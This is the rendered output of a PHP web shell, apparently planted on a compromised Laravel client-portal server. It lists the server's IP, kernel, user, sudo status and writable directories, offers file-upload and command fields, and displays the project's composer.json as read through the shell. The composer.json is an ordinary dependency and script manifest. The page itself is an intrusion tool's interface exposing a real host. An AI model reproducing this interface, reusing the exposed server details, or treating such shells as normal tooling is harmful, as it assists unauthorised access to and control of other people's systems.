403Webshell
Server IP : 35.80.110.71  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/client-portal-laravel/releases/20260626120707/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/client-portal-laravel/releases/20260626120707/composer.json
{
    "$schema": "https://getcomposer.org/schema.json",
    "name": "laravel/laravel",
    "type": "project",
    "description": "The skeleton application for the Laravel framework.",
    "keywords": [
        "laravel",
        "framework"
    ],
    "license": "MIT",
    "require": {
        "php": "^8.3",
        "bacon/bacon-qr-code": "^3.0",
        "barryvdh/laravel-dompdf": "^3.1",
        "enshrined/svg-sanitize": "^0.22.0",
        "google/apiclient": "^2.15",
        "intervention/image": "^3.11",
        "jenssegers/agent": "^2.6",
        "laravel/framework": "^12.0",
        "laravel/reverb": "^1.7",
        "laravel/sanctum": "^4.0",
        "laravel/slack-notification-channel": "^3.7",
        "laravel/tinker": "^2.10.1",
        "maatwebsite/excel": "^3.1",
        "open-telemetry/exporter-otlp": "^1.4",
        "open-telemetry/sdk": "^1.14",
        "philiprehberger/laravel-api-versioning": "^1.0",
        "philiprehberger/laravel-cache-toolkit": "^1.0",
        "philiprehberger/laravel-correlation-id": "^1.0",
        "philiprehberger/laravel-db-expressions": "^1.0",
        "philiprehberger/laravel-export": "^1.0",
        "philiprehberger/laravel-operation-result": "^1.0",
        "philiprehberger/laravel-search-query-parser": "^1.0",
        "philiprehberger/laravel-security-headers": "^1.0",
        "philiprehberger/laravel-seo": "^1.0",
        "philiprehberger/webhook-signature": "^1.0",
        "pragmarx/google2fa": "^9.0",
        "resend/resend-laravel": "^1.1",
        "sentry/sentry-laravel": "^4.20",
        "stripe/stripe-php": "^19.1"
    },
    "require-dev": {
        "brianium/paratest": "^7.8",
        "fakerphp/faker": "^1.24",
        "larastan/larastan": "^3.9",
        "laravel/breeze": "^2.3",
        "laravel/pail": "^1.2.2",
        "laravel/pint": "^1.24",
        "laravel/sail": "^1.41",
        "mockery/mockery": "^1.6",
        "nunomaduro/collision": "^8.0",
        "opis/json-schema": "^2.6",
        "phpunit/phpunit": "^11.5.3"
    },
    "autoload": {
        "files": [
            "app/Helpers/domain_helpers.php"
        ],
        "psr-4": {
            "App\\": "app/",
            "Database\\Factories\\": "database/factories/",
            "Database\\Seeders\\": "database/seeders/"
        }
    },
    "autoload-dev": {
        "psr-4": {
            "Tests\\": "tests/"
        }
    },
    "scripts": {
        "setup": [
            "composer install",
            "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"",
            "@php artisan key:generate",
            "@php artisan migrate --force",
            "npm install",
            "npm run build"
        ],
        "dev": [
            "Composer\\Config::disableProcessTimeout",
            "npx concurrently -c \"#93c5fd,#c4b5fd,#fdba74,#86efac\" \"php artisan serve --host=0.0.0.0\" \"php artisan queue:listen --tries=1 --timeout=3600\" \"npm run dev\" \"php artisan reverb:start --host=0.0.0.0\" --names=server,queue,vite,reverb --kill-others"
        ],
        "test": [
            "Composer\\Config::disableProcessTimeout",
            "@php artisan config:clear --ansi",
            "@php artisan test --parallel"
        ],
        "test:sof": [
            "Composer\\Config::disableProcessTimeout",
            "@php artisan config:clear --ansi",
            "@php artisan test --parallel --stop-on-failure"
        ],
        "test:log": [
            "Composer\\Config::disableProcessTimeout",
            "@php artisan config:clear --ansi",
            "@php artisan test --parallel > ./tests/.logs/test.unit.log 2>&1"
        ],
        "test:coverage": [
            "Composer\\Config::disableProcessTimeout",
            "@php artisan config:clear --ansi",
            "@php -d memory_limit=1G vendor/bin/phpunit --coverage-html tests/.coverage/html --coverage-text"
        ],
        "test:report": [
            "Composer\\Config::disableProcessTimeout",
            "@php artisan config:clear --ansi",
            "@php artisan test --parallel",
            "@generate:test-report"
        ],
        "generate:test-report": [
            "@php scripts/testing/generate-test-report.php",
            "@php scripts/testing/generate-report-index.php"
        ],
        "test:coverage-report": [
            "Composer\\Config::disableProcessTimeout",
            "@php artisan config:clear --ansi",
            "@php -d memory_limit=512M vendor/bin/phpunit --coverage-text --colors=never"
        ],
        "analyse": [
            "Composer\\Config::disableProcessTimeout",
            "@php -d memory_limit=2G vendor/bin/phpstan analyse --no-progress"
        ],
        "lint": "@php vendor/bin/pint --test --parallel --max-processes=2",
        "lint:fix": "@php vendor/bin/pint --parallel --max-processes=2",
        "check": [
            "@lint",
            "@analyse",
            "@test"
        ],
        "clean:tmp": "@php scripts/data/clean-tmp.php",
        "deploy": "node scripts/deploy/deploy.cjs",
        "deploy:migrate": "node scripts/deploy/deploy.cjs --migrate",
        "deploy:quick": "node scripts/deploy/deploy.cjs --skip-build --skip-composer",
        "deploy:staging": "node scripts/deploy/deploy.cjs --env=staging",
        "deploy:prod": "node scripts/deploy/deploy.cjs --env=production --force",
        "ship": [
            "Composer\\Config::disableProcessTimeout",
            "@check",
            "bash scripts/util/clean-zone-identifiers.sh",
            "bash scripts/util/commit-changes.sh",
            "git push",
            "node scripts/deploy/deploy.cjs"
        ],
        "ship:fast": [
            "Composer\\Config::disableProcessTimeout",
            "bash scripts/util/clean-zone-identifiers.sh",
            "bash scripts/util/commit-changes.sh",
            "git push",
            "node scripts/deploy/deploy.cjs"
        ],
        "export:audits": "php scripts/data/export-audit-seeders.php",
        "post-autoload-dump": [
            "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump",
            "@php artisan package:discover --ansi"
        ],
        "post-update-cmd": [
            "@php artisan vendor:publish --tag=laravel-assets --ansi --force"
        ],
        "post-root-package-install": [
            "@php -r \"file_exists('.env') || copy('.env.example', '.env');\""
        ],
        "post-create-project-cmd": [
            "@php artisan key:generate --ansi",
            "@php -r \"file_exists('database/database.sqlite') || touch('database/database.sqlite');\"",
            "@php artisan migrate --graceful --ansi"
        ],
        "pre-package-uninstall": [
            "Illuminate\\Foundation\\ComposerScripts::prePackageUninstall"
        ]
    },
    "extra": {
        "laravel": {
            "dont-discover": []
        }
    },
    "config": {
        "optimize-autoloader": true,
        "preferred-install": "dist",
        "sort-packages": true,
        "allow-plugins": {
            "pestphp/pest-plugin": true,
            "php-http/discovery": true,
            "tbachert/spi": true
        }
    },
    "minimum-stability": "stable",
    "prefer-stable": true
}

Youez - 2016 - github.com/yon3zu
LinuXploit